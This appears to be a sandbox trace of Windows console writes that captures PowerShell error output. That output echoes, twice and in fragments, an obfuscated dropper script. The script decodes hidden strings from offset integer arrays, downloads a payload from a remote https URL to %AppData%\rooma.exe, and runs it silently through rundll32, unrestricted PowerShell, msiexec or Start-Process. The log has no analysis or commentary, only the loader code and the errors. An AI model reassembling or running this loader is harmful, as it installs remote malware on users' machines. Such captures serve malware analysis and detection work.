WriteConsoleW
|
buffer:
Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle:
0x00000023
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle:
0x0000002f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
lowing enumeration values and try again. The possible enumeration values are "S
console_handle:
0x0000003b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
sl3, Tls"."
console_handle:
0x00000047
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At line:1 char:708
console_handle:
0x00000053
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ function dSiVFLsLehn($rfZncQy, $cUgweNexw){[IO.File]::WriteAllBytes($rfZncQy,
console_handle:
0x0000005f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
$cUgweNexw)};function nIdpxHlTQCh($rfZncQy){if($rfZncQy.EndsWith((cWtOpHLjGaAJ
console_handle:
0x0000006b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
QsKH @(77199,77253,77261,77261))) -eq $True){rundll32.exe $rfZncQy }elseif($rfZ
console_handle:
0x00000077
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77265,77268,77202))) -eq $True){powersh
console_handle:
0x00000083
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ell.exe -ExecutionPolicy unrestricted -File $rfZncQy}elseif($rfZncQy.EndsWith((
console_handle:
0x0000008f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
cWtOpHLjGaAJQsKH @(77199,77262,77268,77258))) -eq $True){misexec /qn /i $rfZncQ
console_handle:
0x0000009b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
y}else{Start-Process $rfZncQy}};function jgnVrIPEDBsp($jtGWZjWFaRHXCuqVnz){$Mwn
console_handle:
0x000000a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ACmdhpUHoLnOVAM = New-Object (cWtOpHLjGaAJQsKH @(77231,77254,77269,77199,77240,
console_handle:
0x000000b3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
77254,77251,77220,77261,77258,77254,77263,77269));[Net.ServicePointManager]:: <
console_handle:
0x000000bf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cUgweNexw = $MwnACmdh
console_handle:
0x000000cb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
pUHoLnOVAM.DownloadData($jtGWZjWFaRHXCuqVnz);return $cUgweNexw};function cWtOpH
console_handle:
0x000000d7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
LjGaAJQsKH($UdjhWEgRZQSx){$RtRDovBirTtstBy=77153;$lGTIgueBJPfaj=$Null;foreach($
console_handle:
0x000000e3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
TkMMOsDOXHzTTR in $UdjhWEgRZQSx){$lGTIgueBJPfaj+=[char]($TkMMOsDOXHzTTR-$RtRDov
console_handle:
0x000000ef
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
BirTtstBy)};return $lGTIgueBJPfaj};function VAkrnUGuLGImDnrHn(){$IVSPGGhdAyk =
console_handle:
0x000000fb
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
$env:AppData + '\';$lZOmMJaxLsT = $IVSPGGhdAyk + 'rooma.exe'; if (Test-Path -Pa
console_handle:
0x00000107
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
th $lZOmMJaxLsT){nIdpxHlTQCh $lZOmMJaxLsT;}Else{ $nqvArjE = jgnVrIPEDBsp (cWtOp
console_handle:
0x00000113
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
HLjGaAJQsKH @(77257,77269,77269,77265,77268,77211,77200,77200,77254,77253,77270
console_handle:
0x0000011f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
7254));dSiVFLsLehn $lZOmMJaxLsT $nqvArjE;nIdpxHlTQCh $lZOmMJaxLsT;};;;;}VAkrnUG
console_handle:
0x00000143
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
uLGImDnrHn;
console_handle:
0x0000014f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle:
0x0000015b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ FullyQualifiedErrorId : PropertyAssignmentException
console_handle:
0x00000167
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle:
0x00000187
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
on was closed: Could not establish trust relationship for the SSL/TLS secure ch
console_handle:
0x00000193
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
annel."
console_handle:
0x0000019f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
At line:1 char:806
console_handle:
0x000001ab
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ function dSiVFLsLehn($rfZncQy, $cUgweNexw){[IO.File]::WriteAllBytes($rfZncQy,
console_handle:
0x000001b7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
$cUgweNexw)};function nIdpxHlTQCh($rfZncQy){if($rfZncQy.EndsWith((cWtOpHLjGaAJ
console_handle:
0x000001c3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
QsKH @(77199,77253,77261,77261))) -eq $True){rundll32.exe $rfZncQy }elseif($rfZ
console_handle:
0x000001cf
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ncQy.EndsWith((cWtOpHLjGaAJQsKH @(77199,77265,77268,77202))) -eq $True){powersh
console_handle:
0x000001db
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ell.exe -ExecutionPolicy unrestricted -File $rfZncQy}elseif($rfZncQy.EndsWith((
console_handle:
0x000001e7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
cWtOpHLjGaAJQsKH @(77199,77262,77268,77258))) -eq $True){misexec /qn /i $rfZncQ
console_handle:
0x000001f3
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
y}else{Start-Process $rfZncQy}};function jgnVrIPEDBsp($jtGWZjWFaRHXCuqVnz){$Mwn
console_handle:
0x000001ff
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
ACmdhpUHoLnOVAM = New-Object (cWtOpHLjGaAJQsKH @(77231,77254,77269,77199,77240,
console_handle:
0x0000020b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
77254,77251,77220,77261,77258,77254,77263,77269));[Net.ServicePointManager]::Se
console_handle:
0x00000217
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
curityProtocol = [Net.SecurityProtocolType]::TLS12;$cUgweNexw = $MwnACmdhpUHoLn
console_handle:
0x00000223
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
OVAM.DownloadData <<<< ($jtGWZjWFaRHXCuqVnz);return $cUgweNexw};function cWtOpH
console_handle:
0x0000022f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
LjGaAJQsKH($UdjhWEgRZQSx){$RtRDovBirTtstBy=77153;$lGTIgueBJPfaj=$Null;foreach($
console_handle:
0x0000023b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
TkMMOsDOXHzTTR in $UdjhWEgRZQSx){$lGTIgueBJPfaj+=[char]($TkMMOsDOXHzTTR-$RtRDov
console_handle:
0x00000247
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
BirTtstBy)};return $lGTIgueBJPfaj};function VAkrnUGuLGImDnrHn(){$IVSPGGhdAyk =
console_handle:
0x00000253
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
$env:AppData + '\';$lZOmMJaxLsT = $IVSPGGhdAyk + 'rooma.exe'; if (Test-Path -Pa
console_handle:
0x0000025f
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
th $lZOmMJaxLsT){nIdpxHlTQCh $lZOmMJaxLsT;}Else{ $nqvArjE = jgnVrIPEDBsp (cWtOp
console_handle:
0x0000026b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
HLjGaAJQsKH @(77257,77269,77269,77265,77268,77211,77200,77200,77254,77253,77270
console_handle:
0x00000277
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
7254));dSiVFLsLehn $lZOmMJaxLsT $nqvArjE;nIdpxHlTQCh $lZOmMJaxLsT;};;;;}VAkrnUG
console_handle:
0x0000029b
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
uLGImDnrHn;
console_handle:
0x000002a7
|
1
|
1 |
0
|
WriteConsoleW
|
buffer:
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle:
0x000002b3
|
1
|
1 |
0
|